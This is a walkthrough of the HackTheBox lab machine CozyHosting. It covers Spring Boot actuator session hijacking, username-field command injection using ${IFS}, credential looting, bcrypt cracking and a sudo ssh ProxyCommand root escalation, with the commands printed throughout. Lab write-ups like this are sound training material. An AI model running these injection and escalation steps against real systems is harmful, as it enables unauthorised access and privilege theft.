

Let's start by enumerating all TCP ports with nmap.
nmap -sCV -p- --min-rate 1000 -T4
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We see SSH (port 22) and nginx with 1.80.0 version. I went to but got redirected to http://cozyhosting.htb/, so let's add cozyhosting.htb to /etc/hosts with the target IP.
echo ' cozyhosting.htb' | sudo tee -a /etc/hosts
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Port 80

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There wasn’t anything interesting, so I tried to find hidden subdirectories with gobuster.


gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -u http://cozyhosting.htb/ -x php -b 200,403,404
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I found a /admin subdirectory which redirects me to the login page.
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Upon accessing the /login page and attempting to authenticate with common credentials, I was unable to gain access to the application.

Browsing to /error returns an error page with a header stating Whitelabel Error Page. Researching this error reveals that this application is using Spring Boot.
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Now I will use dirsearch to find more information about subdirectories.


dirsearch -u http://cozyhosting.htb -e php --exclude-sizes 0
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I could use /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt specific wordlist, but I ended up using dirsearch’s default wordlist, and I found the /actuator subdirectory which is mainly used for debugging purposes in Spring Boot applications.

Foothold - CozyHosting

After searching more for actuator meaning on Google, I found out that the Spring Boot actuator module provides a collection of built-in endpoints that expose different types of information and operations on an application.

I checked every /actuator subdirectory and found /actuator/mappings containing the structure of the application.
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On this page, I noticed a /actuator/sessions, which, when I checked, showed the current sessions running.
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By using a curl command, we could also see kanderson's cookie ID as well.
curl -s http://cozyhosting.htb/actuator/sessions | jq .

Now we have a cookie ID EDA00E8504150C5ABF42F621A9F1D908 and a username kanderson, which we can add to our developer console's Storage tab by typing F12 > Storage > Cookies and replacing JSESSIONID with this ID.
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Now if we go to the /admin subdirectory, we will have the current session of this user.
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On the page below, I tried to input my hostname and any name, and it showed an interesting message saying that we tried to do an SSH connection but it failed.
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To analyze this better, I initiated Burp Suite and saw the type of request that was made.
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It does an execute ssh function, so I tried to add localhost instead of my IP, and it was denied, saying a different message: "Host Key verification failed."
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It means the function is running ssh -i key username@hostname, so I tested for command injection vulnerabilities.

host=; ping -c 1
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It appeared Invalid hostname, which means there is a filter on it, so I tried to inject in the username field this time.

username=Ivo; ping -c 1
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Now it appears "Username can't contain whitespaces!", so I used **{IFS}**, a Bash environment variable that represents a space. ![Pasted image 20240830124119.png](/img/user/Digital%20Garden/OSCP/Imgs/Pasted%20image%2020240830124119.png) This time it worked but showed the message: "**Could not resolve hostname ivoclib: Temporary failure in name resolutionping: Name or service not known**," which means that it's reading and executing the command. I added a `#` comment to finalize and tested if I could get a ping connection with `tcpdump`. `tcpdump -ni tun0 icmp` `0xdf;ping{IFS}-cIFS1{IFS};#or0xdf;{ping -c 1};`
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The command injection worked using the brace expansion method.

Lateral Movement

Let's upgrade the shell to a TTY shell.
python3 -c 'import pty;pty.spawn("/bin/bash");'
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Now, if we look around in this directory, we found a jar file called loudhosting-0.0.1.jar. So, let's unzip it and see its content, where I found some credentials in /tmp/app/BOOT-INF/classes/ file.
unzip -d /tmp/app cloudhosting-0.0.1.jar cd /tmp/app cd BOOT-INF cat
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Now, let's use psql to access the POSTGRESQL database with postgres:Vg&nvzAQ7XxR credentials.
psql -h -U postgres
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Listing all the available databases, we observe the presence of the cozyhosting database.
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Let's try to connect to the cozyhosting database and see its content.
\connect cozyhosting
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Let's use a SELECT statement to view all the data present in the users table.
select * from users;
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We have 2 hashes for kanderson and admin users, so let's first identify the hash itself and try to crack it.
hashid '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
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We now know the hashes are bcrypt, so let's use hashcat to crack them.
hashcat admihash -m 3200 /usr/share/wordlists/rockyou.txt
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We now have manchesterunited as the password from the admin hash. I tried to crack kanderson's password hash but without success. Afterward, I saw the users from the target machine and noticed a josh user in the /home directory.
cd /home ls
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Let's try to use the password we found and access it by SSH.
ssh josh@
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Let's get the user flag.
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Privilege Escalation

I first checked the commands I could use as sudo without needing to provide a password, and it showed the /usr/bin/ssh command.
sudo -l
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I found a way to get root privileges with this command on this link, so I used it to get a root shell and then obtained the root flag.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
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